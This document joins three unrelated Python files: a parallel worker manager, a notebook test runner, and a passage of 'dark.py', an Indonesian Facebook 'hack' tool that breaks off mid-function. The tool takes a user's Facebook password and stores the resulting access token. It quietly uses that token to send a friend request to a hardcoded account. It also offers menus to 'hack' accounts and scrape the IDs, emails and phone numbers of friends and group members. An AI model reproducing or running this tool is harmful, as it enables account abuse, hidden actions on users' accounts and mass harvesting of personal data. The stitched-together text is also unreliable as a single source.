class RealWorkerManager(WorkerManager):
""" A worker manager for resnet. """
# pylint: disable=attribute-defined-outside-init
def __init__(self, worker_ids, poll_time=0.5):
""" Constructor. """
super(RealWorkerManager, self).__init__(worker_ids, poll_time)
self._rwm_set_up()
self._child_reset()
def _rwm_set_up(self):
""" Sets things up for the child. """
# Create the result directories. """
self.result_dir_names = {wid:'exp/result_%s'%(str(wid)) for wid in
self.worker_ids}
# Create the working directories
self.working_dir_names = {wid:'exp/working_%s/tmp'%(str(wid)) for wid in
self.worker_ids}
# Create the last receive times
self.last_receive_times = {wid:0.0 for wid in self.worker_ids}
# Create file names
self._result_file_name = 'result.txt'
self._num_file_read_attempts = 10
# self._file_read_poll_time = 0.5 # wait for 0.5 seconds
@classmethod
def _delete_dirs(cls, list_of_dir_names):
""" Deletes a list of directories. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
@classmethod
def _delete_and_create_dirs(cls, list_of_dir_names):
""" Deletes a list of directories and creates new ones. """
for dir_name in list_of_dir_names:
if os.path.exists(dir_name):
shutil.rmtree(dir_name)
os.makedirs(dir_name)
def _child_reset(self):
""" Resets child. """
# Delete/create the result and working directories.
if not hasattr(self, 'result_dir_names'): # Just for the super constructor.
return
self._delete_and_create_dirs(self.result_dir_names.values())
self._delete_dirs(self.working_dir_names.values())
self.free_workers = Set(self.worker_ids)
self.qinfos_in_progress = {wid:None for wid in self.worker_ids}
self.worker_processes = {wid:None for wid in self.worker_ids}
def _get_result_file_name_for_worker(self, worker_id):
""" Computes the result file name for the worker. """
return os.path.join(self.result_dir_names[worker_id], self._result_file_name)
def _read_result_from_file(self, result_file_name):
""" Reads the result from the file name. """
#pylint: disable=bare-except
num_attempts = 0
while num_attempts < self._num_file_read_attempts:
try:
file_reader = open(result_file_name, 'r')
read_in = file_reader.read().strip()
try:
# try converting to float. If not successful, it is likely an error string.
read_in = float(read_in)
except:
pass
file_reader.close()
result = read_in
break
except:
time.sleep(self.poll_time)
file_reader.close()
result = EVAL_ERROR_CODE
return result
def _read_result_from_worker_and_update(self, worker_id):
""" Reads the result from the worker. """
# Read the file
result_file_name = self._get_result_file_name_for_worker(worker_id)
val = self._read_result_from_file(result_file_name)
# Now update the relevant qinfo and put it to latest_results
qinfo = self.qinfos_in_progress[worker_id]
qinfo.val = val
if not hasattr(qinfo, 'true_val'):
qinfo.true_val = val
qinfo.receive_time = self.optimiser.get_curr_spent_capital()
qinfo.eval_time = qinfo.receive_time - qinfo.send_time
self.latest_results.append(qinfo)
# Update receive time
self.last_receive_times[worker_id] = qinfo.receive_time
# Delete the file.
os.remove(result_file_name)
# Delete content in a working directory.
shutil.rmtree(self.working_dir_names[worker_id])
# Add the worker to the list of free workers and clear qinfos in progress.
self.worker_processes[worker_id].terminate()
self.worker_processes[worker_id] = None
self.qinfos_in_progress[worker_id] = None
self.free_workers.add(worker_id)
def _worker_is_free(self, worker_id):
""" Checks if worker with worker_id is free. """
if worker_id in self.free_workers:
return True
worker_result_file_name = self._get_result_file_name_for_worker(worker_id)
if os.path.exists(worker_result_file_name):
self._read_result_from_worker_and_update(worker_id)
else:
return False
def _get_last_receive_time(self):
""" Returns the last time we received a job. """
all_receive_times = self.last_receive_times.values()
return max(all_receive_times)
def a_worker_is_free(self):
""" Returns true if a worker is free. """
for wid in self.worker_ids:
if self._worker_is_free(wid):
return self._get_last_receive_time()
return None
def all_workers_are_free(self):
""" Returns true if all workers are free. """
all_are_free = True
for wid in self.worker_ids:
all_are_free = self._worker_is_free(wid) and all_are_free
if all_are_free:
return self._get_last_receive_time()
else:
return None
def _dispatch_evaluation(self, func_caller, point, qinfo, worker_id, **kwargs):
""" Dispatches evaluation to worker_id. """
#pylint: disable=star-args
if self.qinfos_in_progress[worker_id] is not None:
err_msg = 'qinfos_in_progress: %s,\nfree_workers: %s.'%(
str(self.qinfos_in_progress), str(self.free_workers))
print(err_msg)
raise ValueError('Check if worker is free before sending evaluation.')
# First add all the data to qinfo
qinfo.worker_id = worker_id
qinfo.working_dir = self.working_dir_names[worker_id]
qinfo.result_file = self._get_result_file_name_for_worker(worker_id)
qinfo.point = point
# Create the working directory
os.makedirs(qinfo.working_dir)
# Dispatch the evaluation in a new process
target_func = lambda: func_caller.eval_single(point, qinfo, **kwargs)
self.worker_processes[worker_id] = Process(target=target_func)
self.worker_processes[worker_id].start()
time.sleep(3)
# Add the qinfo to the in progress bar and remove from free_workers
self.qinfos_in_progress[worker_id] = qinfo
self.free_workers.discard(worker_id)
def dispatch_single_evaluation(self, func_caller, point, qinfo, **kwargs):
""" Dispatches a single evaluation to a free worker. """
worker_id = self.free_workers.pop()
self._dispatch_evaluation(func_caller, point, qinfo, worker_id, **kwargs)
def dispatch_batch_of_evaluations(self, func_caller, points, qinfos, **kwargs):
""" Dispatches a batch of evaluations. """
assert len(points) == self.num_workers
for idx in range(self.num_workers):
self._dispatch_evaluation(func_caller, points[idx], qinfos[idx],
self.worker_ids[idx], **kwargs)
def close_all_jobs(self):
""" Closes all jobs. """
pass
def get_time_distro_info(self):
""" Returns information on the time distribution. """
return 'realtime'
|
testrunner.py | #!/usr/bin/env python
# coding: utf-8
from datetime import datetime
startTime = datetime.now()
import itertools
import json
import multiprocessing as mp
import os
import sys
import time
try:
import pandas as pd
import papermill
from tabulate import tabulate
except ImportError:
sys.exit(
"""Some libraries are missing. Please install them by running `pip install -r test_requirements.txt`."""
)
# CONSTANTS
manager = mp.Manager()
TEST_NOTEBOOKS_FILE = "testnotebooks.txt"
TEST_CONFIG_FILE = "testconfig.csv"
SUCCESSES = mp.Value("d", 0)
EXCEPTIONS = mp.Value("d", 0)
SUCCESSFUL_EXECUTIONS = manager.list()
FAILED_EXECUTIONS = manager.list()
CELL_EXECUTION_TIMEOUT_SECONDS = 1200
ROOT = os.path.abspath(".")
jobs = []
# helper functions
def execute_nb_with_params(nb_path, params):
abs_nb_dir_path = os.path.join(ROOT, os.path.dirname(nb_path))
nb_name = os.path.basename(nb_path)
output_nb_name = "output_{}.ipynb".format(nb_name)
os.chdir(abs_nb_dir_path)
print("Current directory: {}".format(os.getcwd()))
print("RUN: " + nb_name + " with parameters " + str(params))
# Execute notebook
test_case = dict({"notebook": nb_name, "params": params})
try:
papermill.execute_notebook(
nb_name,
output_nb_name,
parameters=params,
execution_timeout=CELL_EXECUTION_TIMEOUT_SECONDS,
log_output=True,
)
SUCCESSES.value += 1
SUCCESSFUL_EXECUTIONS.append(test_case)
except BaseException as error:
print("An exception occurred: {}".format(error))
EXCEPTIONS.value += 1
FAILED_EXECUTIONS.append(test_case)
os.chdir(ROOT)
def test_notebook(nb_path, df_test_config):
for i in range(len(df_test_config)):
params = json.loads(df_test_config.loc[i].to_json())
# Coach notebooks support only single instance training, so skip the tests with multiple EC2 instances
if "coach" in nb_path.lower() and params["train_instance_count"] > 1:
continue
p = mp.Process(target=execute_nb_with_params, args=(nb_path, params))
time.sleep(1)
jobs.append(p)
p.start()
def print_notebook_executions(nb_list_with_params):
# This expects a list of dict type items.
# E.g. [{'nb_name':'foo', 'params':'bar'}]
if not nb_list_with_params:
print("None")
return
vals = []
for nb_dict in nb_list_with_params:
val = []
for k, v in nb_dict.items():
val.append(v)
vals.append(val)
keys = [k for k in nb_list_with_params[0].keys()]
print(tabulate(pd.DataFrame([v for v in vals], columns=keys), showindex=False))
if __name__ == "__main__":
notebooks_list = open(TEST_NOTEBOOKS_FILE).readlines()
config = pd.read_csv(TEST_CONFIG_FILE)
# Run tests on each notebook listed in the config.
print("Test Configuration: ")
print(config)
for nb_path in notebooks_list:
print("Testing: {}".format(nb_path))
test_notebook(nb_path.strip(), config)
for job in jobs:
job.join()
# Print summary of tests ran.
print(
"Summary: {}/{} tests passed.".format(SUCCESSES.value, SUCCESSES.value + EXCEPTIONS.value)
)
print("Successful executions: ")
print_notebook_executions(SUCCESSFUL_EXECUTIONS)
# Throw exception if any test fails, so that the CodeBuild also fails.
if EXCEPTIONS.value > 0:
print("Failed executions: ")
print_notebook_executions(FAILED_EXECUTIONS)
raise Exception("Test did not complete successfully")
print("Total time taken for tests: ")
print(datetime.now() - startTime)
|
dark.py | #!/usr/bin/python
# coding=utf-8
#jangan di recode ngentot
#recode jomblo seumur hidup
# (MANG ENGKUR) PEMBUAT
#SUBSCRIBE CHANNEL mang engkur smd-ices
#FOLLOW INSTAGRAM @T&D
#Import module
import os,sys,time,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
from requests.exceptions import ConnectionError
from mechanize import Browser
#-Setting-#
########
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent','Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
#-Keluar-#
def keluar():
print "\033[1;91m[!] Exit"
os.sys.exit()
#-Warna-#
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
#-Animasi-#
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;96m█████████
\033[1;96m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;96m█\033[1;91m▼▼▼▼▼ \033[1;95m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;96m█ \033[1;92m \033[1;95m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;96m█\033[1;91m▲▲▲▲▲\033[1;95m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96mKUYA-PINTAR
\033[1;96m█████████ \033[1;92m«----------✧----------»
\033[1;96m ██ ██
\033[1;96m╔══════════════════════════════════════════════╗
\033[1;96m║\033[1;96m* \033[1;95mAuthor \033[1;93m: \033[1;95mBrother•MR.KUYA PINTAR \033[1;96m ║
\033[1;96m║\033[1;96m* \033[1;96mGitHub \033[1;93m: \033[1;96m\033[4mhttps://github.com/kuy149\033[0m \033[1;96m ║
\033[1;96m║\033[1;96m*\033[1;93mYOUTUBE \033[1;93m: \033[1;91m\033mhttps://youtube.com/c/mang engkur smd\033[0m \033[1;96m ║
\033[1;96m║\033[1;97m*\033[1;97mINSTAGRAM\033[1;92m: \033[1;96m\033m@T&D\033[0m \033[1;96m ║
\033[1;96m╚══════════════════════════════════════════════╝"""
# titik #
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;91m[●] \033[1;92mLoading \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
gagal = []
idteman = []
idfromteman = []
idmem = []
emmem = []
nomem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
##### LICENSE #####
#=================#
def lisensi():
os.system('reset')
masuk()
##### Pilih Login #####
def masuk():
os.system('reset')
print logo
print "\033[1;91m║--\033[1;91m> \033[1;95m1.\033[1;96m Login"
print "\033[1;92m║--\033[1;91m> \033[1;95m2.\033[1;96m Login using token"
print "\033[1;93m║--\033[1;91m> \033[1;95m0.\033[1;96m Exit"
print "\033[1;95m║"
msuk = raw_input("\033[1;96m╚═\033[1;1mD \033[1;93m")
if msuk =="":
print"\033[1;91m[!] Wrong input"
keluar()
elif msuk =="1":
login()
elif msuk =="2":
tokenz()
elif msuk =="0":
keluar()
else:
print"\033[1;91m[!] Wrong input"
keluar()
##### LOGIN #####
#================#
def login():
os.system('reset')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('reset')
print logo
print('\033[1;96m[☆] \033[1;92mLOGIN AKUN FACEBOOK \033[1;91m[☆]')
id = raw_input('\033[1;91m[+] \033[1;36mID\033[1;97m|\033[1;96mEmail\033[1;97m \033[1;91m:\033[1;92m ')
pwd = getpass.getpass('\033[1;95m[+] \033[1;93mPassword \033[1;93m:\033[1;95m ')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;91m[!] No connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
zedd = open("login.txt", 'w')
zedd.write(z['access_token'])
zedd.close()
print '\n\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mLogin successfully'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://github.com/CrazyLolz100')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;91m[!] No connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;91m[!] \033[1;93mAccount Checkpoint")
print("\n\033[1;92m[#] Harap Login Ulang !")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;91m[!] Login Failed")
os.system('rm -rf login.txt')
time.sleep(1)
login()
##### TOKEN #####
def tokenz():
os.system('reset')
print logo
toket = raw_input("\033[1;91m[?] \033[1;92mToken\033[1;91m : \033[1;97m")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
menu()
except KeyError:
print "\033[1;91m[!] Wrong"
e = raw_input("\033[1;91m[?] \033[1;92mWant to pick up token?\033[1;97m[y/n]: ")
if e =="":
keluar()
elif e =="y":
login()
else:
keluar()
##### MENU ##########################################
def menu():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('reset')
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('reset')
print"\033[1;91m[!] \033[1;93mAccount Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] No connection"
keluar()
os.system("reset")
print logo
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m"
print "║\033[1;91m[\033[1;96m✓\033[1;91m]\033[1;97m ID \033[1;91m: \033[1;92m"+id
print "\033[1;97m╚"+40*"═"
print "\033[1;94m║--\033[1;91m> \033[1;93m1.\033[1;95m User information"
print "\033[1;94m║--\033[1;91m> \033[1;93m2.\033[1;95m Get Id/email/hp"
print "\033[1;94m║--\033[1;91m> \033[1;93m3.\033[1;95m Hack facebook account "
print "\033[1;94m║--\033[1;91m> \033[1;93m4.\033[1;95m Bot "
print "\033[1;94m║--\033[1;91m> \033[1;93m5.\033[1;95m Others "
print "\033[1;94m║--\033[1;91m> \033[1;93m6.\033[1;95m Show token "
print "\033[1;94m║--\033[1;91m> \033[1;93m7.\033[1;95m Delete trash "
print "\033[1;94m║--\033[1;91m> \033[1;93m8.\033[1;95m LogOut "
print "\033[1;94m║--\033[1;91m> \033[1;93m0.\033[1;95m Exit the programs "
print "║"
pilih()
#-
def pilih():
zedd = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if zedd =="":
print "\033[1;91m[!] Wrong input"
pilih()
elif zedd =="1":
informasi()
elif zedd =="2":
dump()
elif zedd =="3":
menu_hack()
elif zedd =="4":
menu_bot()
elif zedd =="5":
lain()
elif zedd =="6":
os.system('reset')
print logo
toket=open('login.txt','r').read()
print "\033[1;91m[+] \033[1;92mYour token\033[1;91m :\033[1;97m "+toket
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
elif zedd =="7":
os.remove('out')
elif zedd =="8":
os.system('rm -rf login.txt')
os.system('xdg-open https://github.com/apaansihasw779')
keluar()
elif zedd =="0":
keluar()
else:
print "\033[1;91m[!] Wrong input"
pilih()
##### INFO #####
def informasi():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
aid = raw_input('\033[1;91m[+] \033[1;92mEnter ID\033[1;97m/\033[1;92mName\033[1;91m : \033[1;97m')
jalan('\033[1;91m[✺] \033[1;92mWait a minute \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 42*"\033[1;97m═"
try:
print '\033[1;91m[➹] \033[1;92mName\033[1;97m : '+z['name']
except KeyError: print '\033[1;91m[?] \033[1;92mName\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;91m[?] \033[1;92mID\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;91m[?] \033[1;92mEmail\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mTelephone\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;91m[?] \033[1;92mTelephone\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mLocation\033[1;97m : '+z['location']['name']
except KeyError: print '\033[1;91m[?] \033[1;92mLocation\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mDate of birth\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;91m[?] \033[1;92mDate of birth\033[1;97m : \033[1;91mNot found'
try:
print '\033[1;91m[➹] \033[1;92mSchool\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mNot found'
except KeyError: pass
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
else:
pass
else:
print"\033[1;91m[✖] User not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu()
##### DUMP #####
def dump():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Get ID friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Get ID friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Get ID Search"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Get group member ID"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Get group member email"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Get group member phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Get email friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m8.\033[1;97m Get email friend from friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m9.\033[1;97m Get a friend's phone number"
print "\033[1;97m║--\033[1;91m> \033[1;92m10.\033[1;97m Get a friend's phone number from friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
dump_pilih()
#-----pilih
def dump_pilih():
cuih = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if cuih =="":
print "\033[1;91m[!] Wrong input"
dump_pilih()
elif cuih =="1":
id_teman()
elif cuih =="2":
idfrom_teman()
elif cuih =="3":
os.system('reset')
print "\033[1;91mSegera"
keluar()
elif cuih =="4":
id_member_grup()
elif cuih =="5":
em_member_grup()
elif cuih =="6":
no_member_grup()
elif cuih =="7":
email()
elif cuih =="8":
emailfrom_teman()
elif cuih =="9":
nomor_hp()
elif cuih =="10":
hpfrom_teman()
elif cuih =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
dump_pilih()
##### ID TEMAN #####
def id_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
r=requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman.txt','w')
for a in z['data']:
idteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM TEMAN #####
def idfrom_teman():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
r=requests.get("https://graph.facebook.com/"+idt+"?fields=friends.limit(5000)&access_token="+toket)
z=json.loads(r.text)
jalan('\033[1;91m[✺] \033[1;92mGet all friend id from friend \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/id_teman_from_teman.txt','w')
for a in z['friends']['data']:
idfromteman.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idfromteman))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idfromteman))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/id_teman_from_teman.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### ID FROM MEMBER GRUP #####
def id_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member id \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
idmem.append(a['id'])
bz.write(a['id'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(idmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+a['id']),;sys.stdout.flush();time.sleep(0.0001)
bz.close()
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get id \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal ID \033[1;91m: \033[1;97m%s"%(len(idmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No connection"
keluar()
##### EMAIL FROM GRUP #####
def em_member_grup():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
try:
os.system('reset')
print logo
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
jalan('\033[1;91m[✺] \033[1;92mGet group member email \033[1;97m...')
print 42*"\033[1;97m═"
bz = open('out/em_member_grup.txt','w')
re=requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for a in s['data']:
x = requests.get("https://graph.facebook.com/"+a['id']+"?access_token="+toket)
z = json.loads(x.text)
try:
emmem.append(z['email'])
bz.write(z['email'] + '\n')
print ("\r\033[1;97m[ \033[1;92m"+str(len(emmem))+"\033[1;97m ]\033[1;97m=> \033[1;97m"+z['email']+" | "+z['name']+"\n"),;sys.stdout.flush();time.sleep(0.0001)
except KeyError:
pass
bz.close()
print 42*"\033[1;97m═"
print '\r\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mSuccessfully get email from member group \033[1;97m....'
print"\r\033[1;91m[+] \033[1;92mTotal Email \033[1;91m: \033[1;97m%s"%(len(emmem))
done = raw_input("\r\033[1;91m[+] \033[1;92mSave file with name\033[1;91m :\033[1;97m ")
os.rename('out/em_member_grup.txt','out/'+done)
print("\r\033[1;91m[+] \033[1;92mFile saved \033[1;91m: \033[1;97mout/"+done)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except IOError:
print"\033[1;91m[!] Error creating file"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
dump()
except KeyError:
print('\033[1;91m[!] Error')
